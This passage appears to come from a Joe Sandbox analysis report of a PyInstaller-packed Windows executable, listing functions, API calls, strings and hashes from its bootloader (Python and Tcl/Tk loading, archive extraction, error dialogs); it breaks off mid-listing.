Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-2208601799
Opcode ID: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
Instruction ID: 862d8f9c26cf99cde077d20ac54873f0e1b5492a9afa74cd5e979e3182459948
Opcode Fuzzy Hash: 08011e4291223f8c8b87355f84bdba84e3d11561fc99f88d49761070ad3606f6
Instruction Fuzzy Hash: D8E1FD67A3EB03A1FA15CF15E85417427A6AF08788B987F36C84D863A4FF7CB5488354

Function 00007FF67D001F50 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON

Download Yara Rule

APIs

GetDialogBaseUnits.USER32 ref: 00007FF67D001F9E
MulDiv.KERNEL32 ref: 00007FF67D001FB2
MulDiv.KERNEL32 ref: 00007FF67D001FD3
SystemParametersInfoW.USER32 ref: 00007FF67D00201B
CreateFontIndirectW.GDI32 ref: 00007FF67D00202F
#380.COMCTL32 ref: 00007FF67D002053
CreateWindowExW.USER32 ref: 00007FF67D0020A6
CreateWindowExW.USER32 ref: 00007FF67D002100
CreateWindowExW.USER32 ref: 00007FF67D00215D
CreateWindowExW.USER32 ref: 00007FF67D0021BF
SendMessageW.USER32 ref: 00007FF67D0021DF
SendMessageW.USER32 ref: 00007FF67D0021F9
SendMessageW.USER32 ref: 00007FF67D002218
SendMessageW.USER32 ref: 00007FF67D002237
SendMessageW.USER32 ref: 00007FF67D002255
SendMessageW.USER32 ref: 00007FF67D002273
SendMessageW.USER32 ref: 00007FF67D002291
SendMessageW.USER32 ref: 00007FF67D0022A9
SendMessageW.USER32 ref: 00007FF67D0022C1
GetClientRect.USER32 ref: 00007FF67D0022D0

Part of subcall function 00007FF67D0023F0: GetDC.USER32 ref: 00007FF67D00241B
Part of subcall function 00007FF67D0023F0: SelectObject.GDI32 ref: 00007FF67D002462
Part of subcall function 00007FF67D0023F0: DrawTextW.USER32 ref: 00007FF67D002485
Part of subcall function 00007FF67D0023F0: SelectObject.GDI32 ref: 00007FF67D00249B
Part of subcall function 00007FF67D0023F0: ReleaseDC.USER32 ref: 00007FF67D0024AB
Part of subcall function 00007FF67D0023F0: MoveWindow.USER32 ref: 00007FF67D0024FB
Part of subcall function 00007FF67D0023F0: MoveWindow.USER32 ref: 00007FF67D00253B
Part of subcall function 00007FF67D0023F0: MoveWindow.USER32 ref: 00007FF67D00258E

Strings

Failed to execute script '%ls' due to unhandled exception: %ls, xrefs: 00007FF67D001F7D
Close, xrefs: 00007FF67D002168
BUTTON, xrefs: 00007FF67D002176
STATIC, xrefs: 00007FF67D00205C, 00007FF67D0020B1
EDIT, xrefs: 00007FF67D00210B

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
API String ID: 2446303242-1601438679
Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction ID: 1efbe85863ff93af371fc9539ed9730ea28383d49905062ab18b486acbfdeaf3
Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction Fuzzy Hash: 59A17937228B8196E314CF21E48479AB760F788B88F505A25DB9D43B28DF7DF164CB40

Function 00007FF67D00C67C Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF67D00C698
RtlCaptureContext.KERNEL32 ref: 00007FF67D00C6C5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF67D00C6DF
RtlVirtualUnwind.KERNEL32 ref: 00007FF67D00C720
IsDebuggerPresent.KERNEL32 ref: 00007FF67D00C774
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF67D00C795
UnhandledExceptionFilter.KERNEL32 ref: 00007FF67D00C7A0

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
Instruction ID: 8bb624092c382a0b018689f41f9fa2c72f2043c96b9165500569b760bcba053e
Opcode Fuzzy Hash: be1c9f70274c1bfa0c57ec5397cb0351ad5ab78a1ed88338b70abc701b0ce300
Instruction Fuzzy Hash: 5D317373629B8195EB60CF60E8403ED3360FB44748F44553ADA4D87B98EF38E648C714

Function 00007FF67D01ACD8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF67D01AD51
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF67D01AD69
RtlVirtualUnwind.KERNEL32 ref: 00007FF67D01ADA4
IsDebuggerPresent.KERNEL32 ref: 00007FF67D01ADDD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF67D01ADE7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF67D01ADF2

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
Instruction ID: 2a6cad11aaccbc802450e4b49aa14a261d5ab5d7e5f3c3bb3de0c92d23ffadd9
Opcode Fuzzy Hash: 008726ea591ffa8193f39527e8fee48c852db3d8167e5981d4ed2afc12fe266b
Instruction Fuzzy Hash: 32316237628B8195DB60CF25E8402AE77A0FB88798F541635EE9D83B58EF3CE555CB00

Function 00007FF67D021FE4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D022030
FindFirstFileExW.KERNEL32 ref: 00007FF67D02213A

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
Instruction ID: 9751544c2446eba7def6964b0f0e0fb4a0a01e72925b24fee63a3764d5715969
Opcode Fuzzy Hash: 99e62b62205f6f1247891fef44c3d84ab051c8482e1ee44e82008766d3ad9720
Instruction Fuzzy Hash: B5B1B423B2A68241EA61DFB194046BD6361EB54BE8F446A31EE5D87B85FF3DF445C300

Function 00007FF67D0051F0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,00007FF67D00346E), ref: 00007FF67D005200
GetProcAddress.KERNEL32(?,?,00000000,00007FF67D00346E), ref: 00007FF67D00523A
GetProcAddress.KERNEL32(?,?,00000000,00007FF67D00346E), ref: 00007FF67D00525F
GetProcAddress.KERNEL32(?,?,00000000,00007FF67D00346E), ref: 00007FF67D005284
GetProcAddress.KERNEL32(?,?,00000000,00007FF67D00346E), ref: 00007FF67D0052AC
GetProcAddress.KERNEL32(?,?,00000000,00007FF67D00346E), ref: 00007FF67D0052D4
GetProcAddress.KERNEL32(?,?,00000000,00007FF67D00346E), ref: 00007FF67D0052FC
GetProcAddress.KERNEL32(?,?,00000000,00007FF67D00346E), ref: 00007FF67D005324
GetProcAddress.KERNEL32(?,?,00000000,00007FF67D00346E), ref: 00007FF67D00534C
GetProcAddress.KERNEL32(?,?,00000000,00007FF67D00346E), ref: 00007FF67D005374

Strings

Failed to get address for PyPreConfig_InitIsolatedConfig, xrefs: 00007FF67D00571E
PyUnicode_AsUTF8, xrefs: 00007FF67D0057CA
PyConfig_SetWideStringList, xrefs: 00007FF67D0053E2
Py_DecRef, xrefs: 00007FF67D0051F6
Failed to get address for PyUnicode_Join, xrefs: 00007FF67D0058AE
PyModule_GetDict, xrefs: 00007FF67D005612
PyConfig_Read, xrefs: 00007FF67D00536A
PyMarshal_ReadObjectFromString, xrefs: 00007FF67D0055C2
PyConfig_InitIsolatedConfig, xrefs: 00007FF67D005342
Failed to get address for PyRun_SimpleStringFlags, xrefs: 00007FF67D005746
PyErr_Fetch, xrefs: 00007FF67D005432
PyErr_Restore, xrefs: 00007FF67D0054D2
Failed to get address for PyImport_AddModule, xrefs: 00007FF67D00553E
Failed to get address for PyMem_RawFree, xrefs: 00007FF67D005606
Failed to get address for PyStatus_Exception, xrefs: 00007FF67D00576E
Failed to get address for PyImport_ExecCodeModule, xrefs: 00007FF67D005566
PyStatus_Exception, xrefs: 00007FF67D005752
Failed to get address for PyConfig_Read, xrefs: 00007FF67D005386
Failed to get address for PyConfig_SetBytesString, xrefs: 00007FF67D0053AE
PyUnicode_Decode, xrefs: 00007FF67D0057F2
PyObject_CallFunction, xrefs: 00007FF67D00563A
Failed to get address for PyConfig_SetString, xrefs: 00007FF67D0053D6
Py_InitializeFromConfig, xrefs: 00007FF67D0052A2
Failed to get address for PyObject_CallFunctionObjArgs, xrefs: 00007FF67D00567E
PyUnicode_FromFormat, xrefs: 00007FF67D005842
Failed to get address for PyErr_NormalizeException, xrefs: 00007FF67D005476
Py_PreInitialize, xrefs: 00007FF67D0052F2
Failed to get address for PyUnicode_Replace, xrefs: 00007FF67D0058D6
PyEval_EvalCode, xrefs: 00007FF67D0054FA
Failed to get address for PySys_GetObject, xrefs: 00007FF67D005796
PyObject_Str, xrefs: 00007FF67D0056DA
Failed to get address for PyEval_EvalCode, xrefs: 00007FF67D005516
Py_DecodeLocale, xrefs: 00007FF67D005230
Failed to get address for Py_DecodeLocale, xrefs: 00007FF67D00524C
PyConfig_SetString, xrefs: 00007FF67D0053BA
Failed to get address for PyConfig_SetWideStringList, xrefs: 00007FF67D0053FE
Failed to get address for Py_PreInitialize, xrefs: 00007FF67D00530E
Failed to get address for PyObject_Str, xrefs: 00007FF67D0056F6
Failed to get address for Py_ExitStatusException, xrefs: 00007FF67D005271
Failed to get address for PyUnicode_FromFormat, xrefs: 00007FF67D00585E
PyImport_ImportModule, xrefs: 00007FF67D005572
Failed to get address for PyObject_GetAttrString, xrefs: 00007FF67D0056A6
PyUnicode_Join, xrefs: 00007FF67D005892
Failed to get address for Py_DecRef, xrefs: 00007FF67D005212
Failed to get address for PyUnicode_DecodeFSDefault, xrefs: 00007FF67D005836
PyConfig_Clear, xrefs: 00007FF67D00531A
GetProcAddress, xrefs: 00007FF67D005219
Failed to get address for PyObject_SetAttrString, xrefs: 00007FF67D0056CE
PyObject_SetAttrString, xrefs: 00007FF67D0056B2
Failed to get address for PySys_SetObject, xrefs: 00007FF67D0057BE
Py_Finalize, xrefs: 00007FF67D00527A
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF67D005702
Failed to get address for PyErr_Restore, xrefs: 00007FF67D0054EE
Failed to get address for PyUnicode_Decode, xrefs: 00007FF67D00580E
Failed to get address for PyConfig_Clear, xrefs: 00007FF67D005336
PyUnicode_Replace, xrefs: 00007FF67D0058BA
PyUnicode_FromString, xrefs: 00007FF67D00586A
PyConfig_SetBytesString, xrefs: 00007FF67D005392
PyErr_NormalizeException, xrefs: 00007FF67D00545A
Failed to get address for PyErr_Print, xrefs: 00007FF67D0054C6
PyUnicode_DecodeFSDefault, xrefs: 00007FF67D00581A
PyList_Append, xrefs: 00007FF67D00559A
Py_IsInitialized, xrefs: 00007FF67D0052CA
Failed to get address for PyObject_CallFunction, xrefs: 00007FF67D005656
Failed to get address for PyImport_ImportModule, xrefs: 00007FF67D00558E
PyErr_Clear, xrefs: 00007FF67D00540A
PyImport_AddModule, xrefs: 00007FF67D005522
Failed to get address for PyUnicode_FromString, xrefs: 00007FF67D005886
PySys_SetObject, xrefs: 00007FF67D0057A2
Failed to get address for PyModule_GetDict, xrefs: 00007FF67D00562E
Failed to get address for Py_InitializeFromConfig, xrefs: 00007FF67D0052BE
PyErr_Occurred, xrefs: 00007FF67D005482
PySys_GetObject, xrefs: 00007FF67D00577A
Failed to get address for PyList_Append, xrefs: 00007FF67D0055B6
Failed to get address for PyErr_Clear, xrefs: 00007FF67D005426
PyMem_RawFree, xrefs: 00007FF67D0055EA
Py_ExitStatusException, xrefs: 00007FF67D005255
Failed to get address for PyUnicode_AsUTF8, xrefs: 00007FF67D0057E6
PyErr_Print, xrefs: 00007FF67D0054AA
PyRun_SimpleStringFlags, xrefs: 00007FF67D00572A
PyObject_GetAttrString, xrefs: 00007FF67D00568A
Failed to get address for PyErr_Occurred, xrefs: 00007FF67D00549E
PyObject_CallFunctionObjArgs, xrefs: 00007FF67D005662
PyImport_ExecCodeModule, xrefs: 00007FF67D00554A
Failed to get address for Py_Finalize, xrefs: 00007FF67D005296
Failed to get address for PyMarshal_ReadObjectFromString, xrefs: 00007FF67D0055DE
Failed to get address for PyConfig_InitIsolatedConfig, xrefs: 00007FF67D00535E
Failed to get address for Py_IsInitialized, xrefs: 00007FF67D0052E6
Failed to get address for PyErr_Fetch, xrefs: 00007FF67D00544E

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-4266016200
Opcode ID: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
Instruction ID: 0f170cf70c364640a8fa905e2f69953b6488a265c0aef5c53f5df6495324e904
Opcode Fuzzy Hash: f2f88704c5d1e061734efcee993fe9c6dd7b1185595c7391647c05c7e9d36fbf
Instruction Fuzzy Hash: 8912A866E7EF03A0FA15CF14E85417827A1AF59798B947F35C80E863A4FF7CB5488248

Function 00007FF67D0012B0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67D002B30: MessageBoxW.USER32 ref: 00007FF67D002C05

_fread_nolock.LIBCMT ref: 00007FF67D001499

Strings

malloc, xrefs: 00007FF67D001377
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF67D0014BF
fread, xrefs: 00007FF67D0014C6
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF67D001370
\, xrefs: 00007FF67D0013F5
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF67D00132B
fseek, xrefs: 00007FF67D001332
%s%c%s, xrefs: 00007FF67D0013EE
Failed to extract %s: failed to open archive file!, xrefs: 00007FF67D0012FE

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Message_fread_nolock
String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
API String ID: 3065259568-2316137593
Opcode ID: 7191306b36fa9629016ec528b0469e11664432b189d4a2fa2b9f0e5a0646db98
Instruction ID: 3ce6229853dc5b31e03b546bbc9b06720e97241bae2a5350b64b6d373b4380ea
Opcode Fuzzy Hash: 7191306b36fa9629016ec528b0469e11664432b189d4a2fa2b9f0e5a0646db98
Instruction Fuzzy Hash: 1151B423A3968355EA20EF21A4502FE6394EF447C8F506A31EE4DC7A99FE7CF5458300

Function 00007FF67D0023F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF67D00241B
SelectObject.GDI32 ref: 00007FF67D002462
DrawTextW.USER32 ref: 00007FF67D002485
SelectObject.GDI32 ref: 00007FF67D00249B
ReleaseDC.USER32 ref: 00007FF67D0024AB
MoveWindow.USER32 ref: 00007FF67D0024FB
MoveWindow.USER32 ref: 00007FF67D00253B
MoveWindow.USER32 ref: 00007FF67D00258E
MoveWindow.USER32 ref: 00007FF67D0025D6

Strings

P%, xrefs: 00007FF67D00246F

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction ID: 5eea4158ab6933db2320d26fb0adb0c4922ca02ccd3b16e246a43bf03560e693
Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
Instruction Fuzzy Hash: 5251F9266247A186D634DF36E0581BAB7A1FB98B65F004225EFCE83644EF3CF045D710

Function 00007FF67D008570 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF67D002A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D008597
FormatMessageW.KERNEL32 ref: 00007FF67D0085C6
WideCharToMultiByte.KERNEL32 ref: 00007FF67D00861C

Part of subcall function 00007FF67D0029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67D0088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D002A14
Part of subcall function 00007FF67D0029E0: MessageBoxW.USER32 ref: 00007FF67D002AF0

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF67D008626
No error messages generated., xrefs: 00007FF67D0085D0
WideCharToMultiByte, xrefs: 00007FF67D00862D
PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00007FF67D008639
PyInstaller: FormatMessageW failed., xrefs: 00007FF67D0085E3
FormatMessageW, xrefs: 00007FF67D0085D7

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ErrorLastMessage$ByteCharFormatMultiWide
String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
API String ID: 2920928814-2573406579
Opcode ID: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
Instruction ID: cf95dee0e8ca745476810e2344fb80e0e1eead2190d848008b4feba337fb01fe
Opcode Fuzzy Hash: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
Instruction Fuzzy Hash: A3217133A38A4292EB60DF21E8402796365FF88388F942A35D54DC26A4FF3CF545C750

Function 00007FF67D0168A4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D0168E7
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D016CD4
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D016F70

Strings

:, xrefs: 00007FF67D016AA0
f, xrefs: 00007FF67D016A09
-, xrefs: 00007FF67D01697D
p, xrefs: 00007FF67D016999
p, xrefs: 00007FF67D016A11

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
Instruction ID: ef900c19b8d892b35e97bce11e61bcf7ca681576abd7507371b39ed75f628966
Opcode Fuzzy Hash: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
Instruction Fuzzy Hash: D112D56BE2C24386FB205E14D9542BD76A1FB80758FC45A35E689876C4FF3EF4849B04

Function 00007FF67D011208 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D011248
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D011610
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D0118AF

Strings

f, xrefs: 00007FF67D0112E0
f, xrefs: 00007FF67D011495
p, xrefs: 00007FF67D0112ED
p, xrefs: 00007FF67D011352
